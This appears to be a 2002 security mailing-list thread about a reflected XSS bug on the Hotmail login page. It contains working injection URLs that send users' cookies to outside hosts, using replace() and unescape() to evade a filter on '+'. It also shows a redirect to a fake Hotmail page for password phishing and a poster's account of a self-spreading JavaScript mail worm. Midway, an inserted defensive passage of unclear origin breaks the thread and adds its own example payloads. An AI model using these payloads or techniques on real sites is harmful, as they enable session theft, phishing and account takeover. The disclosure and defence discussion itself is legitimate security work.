RE: XSS bug in hotmail login page
> From: Russell Harding [mailto:[EMAIL PROTECTED]]
>
> Is there another way to exploit this which I am not seeing? Or does MSN actually have their act together (in this particular case...)?
>
> -Russell
>
> P.S. Well, I suppose the real question may be this: Is there a way to concatenate javascript strings without + or %2B?

Sure there is, the first that springs to mind is to use the replace method which all strings have:

var myString = "hi $".replace('$','monkeyboy');
alert( myString ); // alerts hi monkeyboy

The first argument can be both a string or a regular expression.

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;scriptlocation.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.replace('$',document.cookie));/scriptct=1033054530_setlang=,,-1,0

Regards
Thor Larholm
Jubii A/S - Internet Programmer
Re: XSS bug in hotmail login page
A lot can happen for sure, but I tried one myself, to redirect the request to some other webpage. One can make a fake hotmail page asking for the password, storing it locally in a text file and then again redirecting to the original hotmail page. Using this method one could steal passwords of hotmail/MSN users.

We have all seen previously people making hotmail-looking pages, asking you to first login through it, or asking you to send your login/pass along with the login name of the person you want to get hacked (all nasty scams like that). Now if it is not fixed they will have an easy way to trick them by asking them to visit the hotmail new policy at:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;scriptlocation.replace(http://www.ownhomepage.com/frames/hotmailfake.html;);/scriptct=1033054530_setlang=

And then have a fake setup to trick them into entering their passwords at:

http://www.ownhomepage.com/frames/hotmailfake.html

Regards
Muhammad Faisal Rauf Danka
Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202
Re: XSS bug in hotmail login page
If you can't get spaces in, escape them:

eval(unescape("alert('spaces%20wherever%20you%20want');"));

You can encode any character you want this way.

I have some papers on XSS bugs and their implications and some tips, tricks and tools online at my website. Might be interesting for all you wannabe XSS-hackers and anybody who has a website or web-based application to secure from XSS.

http://spoor12.edup.tudelft.nl/

Impact for the hotmail XSS:

I wrote a hotmail virus a few months back. It's written in javascript and it abuses XSS bugs to spread itself to all people in your addressbook and inbox. It works like a charm on IE and Netscape (probably Mozilla too). It infects yahoo too (using another, yet undisclosed, XSS bug in yahoo). I was working on a port to mail.com but got bored.

Combine this mass-mailer worm with the recent download-and-execute-any-file bugs for IE by Jelmer and friends and you've got another mass-mailin', backdoorin', script-kiddie virus. Only this time it's not just for Outlook but for any javascript capable browser(!)

So, amongst the known security problems XSS poses, you can now add that XSS bugs can lead to infection with a virus and/or a backdoor.

(I hope you're not reading this with webbased hotmail or yahoo ;)

Berend-Jan Wever
[EMAIL PROTECTED]
http://spoor12.edup.tudelft.nl/
0x0dd31337 - you know who you are ;)

----- Original Message -----
From: Muhammad Faisal Rauf Danka [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, October 08, 2002 14:11
Subject: Re: XSS bug in hotmail login page
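Thor's replace-based concatenation and Berend-Jan's eval(unescape(...)) make the same point for a defender: a filter that strips + and %2B from a reflected parameter leaves script injection untouched, because the payload never needed those characters. The following is an added example, not code from this thread or from Hotmail; naiveFilter models the stripping behaviour Russell describes, htmlEncode is the contextual output encoding that actually neutralises such input, and the page template and payloads are constructed for this demonstration.

```javascript
// Added example: blocklist stripping of '+' / '%2B' versus contextual HTML
// output encoding. The page template and payloads are constructed here.

// Blocklist filter as described in the thread: remove '+' and '%2B' only.
function naiveFilter(param) {
  return param.replace(/\+|%2B/gi, "");
}

// Encode for an HTML text or quoted-attribute context, so that no value,
// whatever characters it uses, can close the attribute or open a tag.
function htmlEncode(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return value.replace(/[&<>"'/]/g, (c) => map[c]);
}

// Stand-in for a login page reflecting its cb= parameter into HTML.
function renderPage(cbValue, sanitize) {
  return `<input name="cb" value="${sanitize(cbValue)}">`;
}

// Detection helper: does a live <script> element survive in the output?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payloads containing no '+' at all, mirroring the thread's
// tricks: String.prototype.replace for concatenation, unescape for spaces.
const PAYLOAD_REPLACE =
  `"><script>location.replace('https://example.invalid/?$'.replace('$',document.title))</script>`;
const PAYLOAD_UNESCAPE =
  `"><script>eval(unescape("alert('hi%20there')"))</script>`;

// For each payload, report whether a script element survives each defence.
function demo() {
  return {
    naiveReplace: containsScriptTag(renderPage(PAYLOAD_REPLACE, naiveFilter)),
    naiveUnescape: containsScriptTag(renderPage(PAYLOAD_UNESCAPE, naiveFilter)),
    encodedReplace: containsScriptTag(renderPage(PAYLOAD_REPLACE, htmlEncode)),
    encodedUnescape: containsScriptTag(renderPage(PAYLOAD_UNESCAPE, htmlEncode)),
  };
}

console.log(demo()); // naive*: true (script survives), encoded*: false
```

The blocklist passes both payloads through unchanged, while encoding the value for its HTML context turns `<script>` into `&lt;script&gt;` regardless of which characters the input relies on.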
RE: XSS bug in hotmail login page
Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:
> It's very simple, you can inject arbitrary scripting to be executed by the user in the context of hotmail. This means that you can e.g. steal his cookies or, if he's logged in, write emails from his account, delete his mails and change his password.

I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's from GET requests. While you can view your own cookies easily, I'm not sure if you can still exploit this bug. I do know filtering these characters prevents this sort of attack:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;scriptdocument.location.replace('http://attacker.com/steal.cgi?'+document.cookie);/scriptct=1033054530_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN actually have their act together (in this particular case...)?

-Russell

P.S. Well, I suppose the real question may be this: Is there a way to concatenate javascript strings without + or %2B?

On Mon, 7 Oct 2002, Thor Larholm wrote:
> > From: Peter Rdam [mailto:[EMAIL PROTECTED]]
> > They didn't react, and I'm pretty curious about what is possible with the bug. And I actually hope that someone can tell me about it and maybe Microsoft will do something about it..
>
> It's very simple, you can inject arbitrary scripting to be executed by the user in the context of hotmail. This means that you can e.g. steal his cookies or, if he's logged in, write emails from his account, delete his mails and change his password.
>
> Regards
> Thor Larholm
> Jubii A/S - Internet Programmer